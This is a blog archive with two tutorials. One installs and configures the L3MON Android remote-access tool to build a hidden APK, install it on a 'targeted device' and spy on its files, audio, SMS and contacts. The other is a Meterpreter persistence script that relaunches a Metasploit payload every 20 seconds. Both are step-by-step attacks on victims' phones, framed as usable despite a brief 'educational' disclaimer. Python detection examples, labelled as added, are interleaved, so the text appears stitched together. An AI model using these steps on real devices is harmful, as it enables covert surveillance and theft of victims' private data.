Archive for the ‘Android Tricks’ Category



L3MON is a remote Android management suite that we can use to gain access to any Android smartphone. In simple terms, it is an Android RAT (Remote Administrative Tool).

In today’s detailed tutorial we learn how to install & configure L3MON on our Kali Linux system and use it.

Using L3MON we can build an Android APK payload and send it to an Android device. Once it is installed on the device, we gain access to the device through L3MON's web-based interface, from which we can send commands and have them executed on the targeted devices.

L3MON has many features, including the following:

  • GPS Logging
  • Microphone Recording
  • View Contacts
  • SMS Logs
  • Send SMS
  • Call Logs
  • View Installed Apps
  • View Stub Permissions
  • Live Clipboard Logging
  • Live Notification Logging
  • View WiFi Networks (logs previously seen)
  • File Explorer & Downloader
  • Command Queuing
  • Built-In APK Builder

  Installing L3MON in Kali Linux

We need Java Runtime Environment 8 and Node.js installed on our machine to run L3MON.

First, we install the JRE (Java Runtime Environment) on our system by applying the following command:

sudo apt-get install openjdk-8-jre 

This command will install JRE version 8 on our system as shown in the following screenshot.


Then we need to install Node.js on our system. We apply the following command to set up the Node.js package source on our system.

curl -sL https://deb.nodesource.com/setup_13.x | sudo bash -

Then we run the following command to install it.

sudo apt-get install -y nodejs



Then we install pm2 process manager by using the following command:

sudo npm install pm2 -g

Now we are ready to install and configure L3MON.

We download the release archive from its GitHub page by using the wget command:

wget https://github.com/D3VL/L3MON/releases/download/1.1.2/L3MON-v1.1.2.zip

This command will download L3MON in our system. Now we create a new folder in our Desktop named L3MON and copy the downloaded zip file there.

Then extract it by right-clicking on the zip file and choose “extract here”.


Then we open a terminal window and navigate to L3MON in our Desktop by simply using cd command:

cd ~/Desktop/L3MON

Here we install all the dependencies by using the following command:

npm install

It will now install the dependencies, as we can see in the following screenshot:

Let's start the server by using the following command:

pm2 start index.js

Now we can open our server in the browser at http://localhost:22533, where there will be a login page as in the following screenshot:


We need to create a login for our server here: we can't log in yet because we have not set a password. To set one, we first stop the service by using the following command:

pm2 stop index.js

Now we need to edit the maindb.json file using a text editor; here we use mousepad.

mousepad maindb.json

Here we can edit the username if we want. In the password field, however, we must enter the MD5 hash of our password; a plain-text password will not work.

How do we create the MD5 hash of a password? Suppose our password is qwerty (this is only an example; we shouldn't choose easy passwords, for security reasons). To convert it to MD5, we run the following command in another terminal window.

echo -n "qwerty" | md5sum | cut -d" " -f 1

Here we got the MD5 hash of our password as we can see in the following screenshot.


Then we fill our username and password in maindb.json file then save and close this file.


Now we again start the server by using the following command :

pm2 start index.js

Then we again open localhost on port 22533 in the browser.

As we set our username to kali and our password to qwerty, we fill those in and click on login.

We are successfully logged in.

Now we are in control. We need to open the APK builder tab.


Here we put our IP address (local or public) and leave the port as default and click on build.

Note: If we want to control an Android device on our local network (same WiFi), we can use our local IP; to connect devices through the internet, we need to use our public IP (a static IP is preferred for long-term use).

After clicking on the build we got an error like this.


We solved this error by configuring Java in another terminal with the following command:

update-alternatives --config java

Then we type 2 and press Enter.

Then we restart our running L3MON server by using the following command:

pm2 restart all

Bingo, the error is gone and the build is now ready to download.


Now we can download L3MON.apk to our system, send it to the targeted device by any means, and install it there.

After a successful installation on the targeted device, when the phone's user opens the app, L3MON asks for all the device permissions and automatically hides itself from the app drawer.
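The behaviour described above (an app that holds most of the listed capabilities and then removes its launcher icon) is something a defender can triage for in an app inventory. The following is an added example, not code from L3MON or from the original article; the mapping from the feature list to standard Android permission names, the record layout and the package names are assumptions made for illustration.

```python
# Added defensive example (not L3MON code). The feature-to-permission mapping
# is an assumption built from standard Android permission names.
FEATURE_PERMISSIONS = {
    "GPS logging": "android.permission.ACCESS_FINE_LOCATION",
    "Microphone recording": "android.permission.RECORD_AUDIO",
    "View contacts": "android.permission.READ_CONTACTS",
    "SMS logs": "android.permission.READ_SMS",
    "Send SMS": "android.permission.SEND_SMS",
    "Call logs": "android.permission.READ_CALL_LOG",
    "File explorer": "android.permission.READ_EXTERNAL_STORAGE",
}

def triage(app, min_features=5):
    """Return (flagged, matched_features) for one inventory record."""
    granted = set(app["granted"])
    matched = sorted(f for f, p in FEATURE_PERMISSIONS.items() if p in granted)
    if app["notification_listener"]:
        matched.append("Notification logging")
    # System components often have no icon, so only user-installed apps
    # without a launcher activity count as "hidden".
    hidden = not app["has_launcher"] and not app["system_app"]
    return hidden and len(matched) >= min_features, matched

# Constructed inventory records (hypothetical package names), shaped like an
# MDM export or a parsed per-package permission listing.
ALL = list(FEATURE_PERMISSIONS.values())
INVENTORY = [
    {"package": "com.example.messenger", "granted": ALL[:6],
     "notification_listener": True, "has_launcher": True, "system_app": False},
    {"package": "com.example.hiddenservice", "granted": ALL,
     "notification_listener": True, "has_launcher": False, "system_app": False},
    {"package": "com.example.vendor.telephony", "granted": ALL[3:6],
     "notification_listener": False, "has_launcher": False, "system_app": True},
    {"package": "com.example.iconpack", "granted": ALL[6:],
     "notification_listener": False, "has_launcher": False, "system_app": False},
]

def flagged_packages(inventory):
    """Packages that are hidden, user-installed and broadly privileged."""
    return [app["package"] for app in inventory if triage(app)[0]]

if __name__ == "__main__":
    for app in INVENTORY:
        print(app["package"], *triage(app))
```

A legitimate messenger with the same permissions is not flagged because it keeps its launcher icon; the combination of breadth and hiding is what raises the score.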

After this, we got a connection with the device. We can check it on our Devices tab.

Now we can control this phone from the manage button. Here in the following screenshot, we are in the file manager of the phone. Now we can spy on this phone.


Our downloaded data and recorded audio clips will be saved under assets/webpublic/client_downloads/ directory.

Our discussed method is for the local network. To connect a device from the internet we prefer to have a static IP address and forward our default port 22533 in our router settings or we can change the default port by changing these lines (inside includes/const.js).

Using this method we can control phones connected to the same network. We can also control devices through the internet by using ngrok services. Configuring L3MON on a VPS will make it portable and useful.

Disclaimer

Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool or this tutorial.
L3MON is built and our article is documented for both Educational and Internal use ONLY.

Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.


Hello guys, today we’re going to show you how hackers can create a persistent backdoor in android using Kali Linux after hacking with msfvenom.

You can use any of the methods above to hack the Android device, but once you get the meterpreter session, that session is not persistent. To make it persistent, you need to upload a shell script to any location in the /sdcard directory.

Generally, your victim’s device is not rooted, so you can’t create any file in /etc/init.d directory due to fewer permissions, so we are using another method to upload a backdoor in /sdcard directory using shell command and then will execute the script which automatically makes a persistent backdoor in that android device.

Here are the steps which you need to follow:

First required part is to get the meterpreter session by using any of the methods, there are a lot of methods to build a backdoor .apk file like using TheFatRat, msfvenom and spade etc. You can use any of the methods and get the meterpreter session.

As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:

#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

And save it as anyname.sh

Here's the updated version of the above shell script, which is 100% compatible with all Android versions:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

After that, you need to get into the root directory of the android device by typing “cd /” in the terminal.

Now you need to get into /sdcard location by typing “cd /sdcard” in the same terminal.

Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in the same terminal.

Now, all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.

Here you need to again go into the same location i.e. cd /root/sdcard and execute the backdoor using “sh yeahhub-backdoor.sh“.

In the above screenshot, as you can see, your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.

You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in the above screen.

The persistence of the backdoor will only remain until a reboot of the Android system. If your victim is in the same network, i.e. LAN, then the persistence will remain forever on LAN, and if you have a static IP, then your persistence will remain forever on WAN too.
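Because the script above relaunches the same activity on a fixed 20-second timer, it leaves a regular trail of activity-start entries in the device log. The following is an added example for defenders, not part of the original post: it flags any component that is started repeatedly at a near-constant interval, which generalises beyond the one package name shown here. The log lines are constructed in the style of logcat's threadtime output, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Matches activity-start entries written by the Android activity manager.
START_RE = re.compile(
    r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d{3}).*?Activity(?:Task)?Manager: "
    r"START u\d+ \{.*?cmp=([^\s}]+)"
)

def periodic_relaunches(lines, min_starts=4, max_jitter=2.0):
    """Return {component: mean_interval_seconds} for timer-like relaunches."""
    starts = defaultdict(list)
    for line in lines:
        m = START_RE.match(line)
        if m:
            # logcat omits the year; a fixed one is enough to compute gaps.
            ts = datetime.strptime("2000-" + m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            starts[m.group(2)].append(ts)
    findings = {}
    for component, times in starts.items():
        if len(times) < min_starts:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Human-driven launches are irregular; a sleep loop is not.
        if pstdev(gaps) <= max_jitter:
            findings[component] = round(mean(gaps), 1)
    return findings

def _line(ts, component):
    """Build one constructed log line (uid and pids are made up)."""
    return (f"01-15 {ts}  1412  1533 I ActivityTaskManager: START u0 "
            f"{{act=android.intent.action.MAIN flg=0x10000000 "
            f"cmp={component}}} from uid 10234")

# Constructed sample: one component on a ~20 s timer, one used normally.
SAMPLE_LOG = (
    [_line(t, "com.metasploit.stage/.MainActivity") for t in
     ("10:00:00.100", "10:00:20.180", "10:00:40.250",
      "10:01:00.330", "10:01:20.410")]
    + [_line(t, "com.example.mail/.Inbox") for t in
       ("10:00:05.000", "10:03:45.000", "10:04:10.000", "10:20:00.000")]
    + ["01-15 10:00:01.000  1412  1533 I WifiService: scan complete"]
)

if __name__ == "__main__":
    print(periodic_relaunches(SAMPLE_LOG))
```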


Posted by Shubham ;)